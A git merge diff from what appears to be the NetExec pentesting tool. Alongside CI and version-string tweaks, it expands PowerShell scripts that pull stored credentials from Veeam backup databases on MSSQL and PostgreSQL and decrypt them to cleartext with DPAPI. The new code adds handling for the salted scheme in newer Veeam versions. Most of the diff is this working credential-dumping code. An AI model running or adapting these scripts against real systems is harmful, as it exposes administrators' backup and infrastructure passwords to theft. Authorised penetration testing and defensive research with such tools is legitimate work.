Merge branch 'main' into remove_pywerview

Signed-off-by: mpgn <[email protected]>

.github/workflows/test.yml

@@ -19,7 +19,9 @@ jobs:
       - uses: actions/checkout@v4
       - name: Install poetry
         run: |
-          pipx install poetry==1.8.4
+          pipx install poetry
+          poetry --version
+          poetry env info
       - name: NetExec set up python ${{ matrix.python-version }} on ${{ matrix.os }}
         uses: actions/setup-python@v5
         with:
@@ -29,11 +31,6 @@ jobs:
       - name: Install with pipx
         run: |
           pipx install . --python python${{ matrix.python-version }}
-      - name: Install poetry
-        run: |
-          pipx install poetry --python python${{ matrix.python-version }}
-          poetry --version
-          poetry env info
       - name: Install libraries with dev group
         run: |
           poetry install --with dev
@@ -48,4 +45,4 @@ jobs:
           poetry run netexec mssql 127.0.0.1
           poetry run netexec ssh 127.0.0.1
           poetry run netexec ftp 127.0.0.1
-          poetry run netexec smb 127.0.0.1 -M veeam
+          poetry run netexec smb 127.0.0.1 -L

nxc/cli.py

@@ -19,11 +19,13 @@ def gen_cli_args():
 
     try:
         VERSION, COMMIT = importlib.metadata.version("netexec").split("+")
+        DISTANCE, COMMIT = COMMIT.split(".")
     except ValueError:
         VERSION = importlib.metadata.version("netexec")
         COMMIT = ""
+        DISTANCE = ""
     CODENAME = "NeedForSpeed"
-    nxc_logger.debug(f"NXC VERSION: {VERSION} - {CODENAME} - {COMMIT}")
+    nxc_logger.debug(f"NXC VERSION: {VERSION} - {CODENAME} - {COMMIT} - {DISTANCE}")
 
     generic_parser = argparse.ArgumentParser(add_help=False, formatter_class=DisplayDefaultsNotNone)
     generic_group = generic_parser.add_argument_group("Generic", "Generic options for nxc across protocols")
@@ -130,7 +132,7 @@ def gen_cli_args():
         sys.exit(1)
 
     if args.version:
-        print(f"{VERSION} - {CODENAME} - {COMMIT}")
+        print(f"{VERSION} - {CODENAME} - {COMMIT} - {DISTANCE}")
         sys.exit(1)
 
     # Multiply output_tries by 10 to enable more fine granural control, see exec methods

nxc/data/veeam_dump_module/veeam_dump_mssql.ps1

@@ -1,9 +1,10 @@
 $SqlDatabaseName = "REPLACE_ME_SqlDatabase"
 $SqlServerName = "REPLACE_ME_SqlServer"
 $SqlInstanceName = "REPLACE_ME_SqlInstance"
+$b64Salt = "REPLACE_ME_b64Salt"
 
 #Forming the connection string
-$SQL = "SELECT [user_name] AS 'User',[password] AS 'Password' FROM [$SqlDatabaseName].[dbo].[Credentials] WHERE password <> ''" #Filter empty passwords
+$SQL = "SELECT [user_name] AS 'User', [password] AS 'Password', [description] AS 'Description' FROM [$SqlDatabaseName].[dbo].[Credentials] WHERE password <> ''" #Filter empty passwords
 $auth = "Integrated Security=SSPI;" #Local user
 $connectionString = "Provider=sqloledb; Data Source=$SqlServerName\$SqlInstanceName; Initial Catalog=$SqlDatabaseName; $auth;"
 $connection = New-Object System.Data.OleDb.OleDbConnection $connectionString
@@ -22,19 +23,46 @@ catch {
 	exit -1
 }
 
-$rows=($dataset.Tables | Select-Object -Expand Rows)
-if ($rows.count -eq 0) {
+$output=($dataset.Tables | Select-Object -Expand Rows)
+if ($output.count -eq 0) {
 	Write-Host "No passwords found!"
 	exit
 }
 
 Add-Type -assembly System.Security
-#Decrypting passwords using DPAPI
-$rows | ForEach-Object -Process {
-	$EnryptedPWD = [Convert]::FromBase64String($_.password)
-	$ClearPWD = [System.Security.Cryptography.ProtectedData]::Unprotect( $EnryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )
+# Decrypting passwords using DPAPI
+$output | ForEach-Object -Process {
+	$EncryptedPWD = [Convert]::FromBase64String($_.password)
 	$enc = [system.text.encoding]::Default
-	$_.password = $enc.GetString($ClearPWD) -replace '\s', 'WHITESPACE_ERROR'
+
+	try {
+		# Decrypt password with DPAPI (old Veeam versions)
+		$raw = [System.Security.Cryptography.ProtectedData]::Unprotect( $EncryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )
+		$pw_string = $enc.GetString($raw) -replace '\s', 'WHITESPACE_ERROR'
+	} catch {
+		try{
+			# Decrypt password with salted DPAPI (new Veeam versions)
+			$salt = [System.Convert]::FromBase64String($b64Salt)
+			$hex = New-Object -TypeName System.Text.StringBuilder -ArgumentList ($EncryptedPWD.Length * 2)
+			foreach ($byte in $EncryptedPWD)
+			{
+				$hex.AppendFormat("{0:x2}", $byte) > $null
+			}
+			$hex = $hex.ToString().Substring(74,$hex.Length-74)
+			$EncryptedPWD = New-Object -TypeName byte[] -ArgumentList ($hex.Length / 2)
+			for ($i = 0; $i -lt $hex.Length; $i += 2)
+			{
+				$EncryptedPWD[$i / 2] = [System.Convert]::ToByte($hex.Substring($i, 2), 16)
+			}
+			$raw = [System.Security.Cryptography.ProtectedData]::Unprotect($EncryptedPWD, $salt, [System.Security.Cryptography.DataProtectionScope]::LocalMachine)
+			$pw_string = $enc.GetString($raw) -replace '\s', 'WHITESPACE_ERROR'
+		}catch {
+			$pw_string = "COULD_NOT_DECRYPT"
+		}
+	}
+	$_.user = $_.user -replace '\s', 'WHITESPACE_ERROR'
+	$_.password = $pw_string
+	$_.description = $_.description -replace '\s', 'WHITESPACE_ERROR'
 }
 
-Write-Output $rows | Format-Table -HideTableHeaders | Out-String
+Write-Output $output | Format-Table -HideTableHeaders | Out-String -Width 10000

nxc/data/veeam_dump_module/veeam_dump_postgresql.ps1

@@ -1,22 +1,50 @@
 $PostgreSqlExec = "REPLACE_ME_PostgreSqlExec"
 $PostgresUserForWindowsAuth = "REPLACE_ME_PostgresUserForWindowsAuth"
 $SqlDatabaseName = "REPLACE_ME_SqlDatabaseName"
+$b64Salt = "REPLACE_ME_b64Salt"
 
-$SQLStatement = "SELECT user_name AS User,password AS Password FROM credentials WHERE password != '';"
+$SQLStatement = "SELECT user_name AS User, password AS Password, description AS Description  FROM credentials WHERE password != '';"
 $output = . $PostgreSqlExec -U $PostgresUserForWindowsAuth -w -d $SqlDatabaseName -c $SQLStatement --csv | ConvertFrom-Csv
 
 if ($output.count -eq 0) {
 	Write-Host "No passwords found!"
 	exit
 }
 
+# Decrypting passwords using DPAPI
 Add-Type -assembly System.Security
-#Decrypting passwords using DPAPI
 $output | ForEach-Object -Process {
-    $EnryptedPWD = [Convert]::FromBase64String($_.password)
-	$ClearPWD = [System.Security.Cryptography.ProtectedData]::Unprotect( $EnryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )
+	$EncryptedPWD = [Convert]::FromBase64String($_.password)
 	$enc = [system.text.encoding]::Default
-	$_.password = $enc.GetString($ClearPWD) -replace '\s', 'WHITESPACE_ERROR'
+
+	try {
+		# Decrypt password with DPAPI (old Veeam versions)
+		$raw = [System.Security.Cryptography.ProtectedData]::Unprotect( $EncryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )
+		$pw_string = $enc.GetString($raw) -replace '\s', 'WHITESPACE_ERROR'
+	} catch {
+		try{
+			# Decrypt password with salted DPAPI (new Veeam versions)
+			$salt = [System.Convert]::FromBase64String($b64Salt)
+			$hex = New-Object -TypeName System.Text.StringBuilder -ArgumentList ($EncryptedPWD.Length * 2)
+			foreach ($byte in $EncryptedPWD)
+			{
+				$hex.AppendFormat("{0:x2}", $byte) > $null
+			}
+			$hex = $hex.ToString().Substring(74,$hex.Length-74)
+			$EncryptedPWD = New-Object -TypeName byte[] -ArgumentList ($hex.Length / 2)
+			for ($i = 0; $i -lt $hex.Length; $i += 2)
+			{
+				$EncryptedPWD[$i / 2] = [System.Convert]::ToByte($hex.Substring($i, 2), 16)
+			}
+			$raw = [System.Security.Cryptography.ProtectedData]::Unprotect($EncryptedPWD, $salt, [System.Security.Cryptography.DataProtectionScope]::LocalMachine)
+			$pw_string = $enc.GetString($raw) -replace '\s', 'WHITESPACE_ERROR'
+		}catch {
+			$pw_string = "COULD_NOT_DECRYPT"
+		}
+	}
+	$_.user = $_.user -replace '\s', 'WHITESPACE_ERROR'
+	$_.password = $pw_string
+	$_.description = $_.description -replace '\s', 'WHITESPACE_ERROR'
 }
 
-Write-Output $output | Format-Table -HideTableHeaders | Out-String
+Write-Output $output | Format-Table -HideTableHeaders | Out-String -Width 10000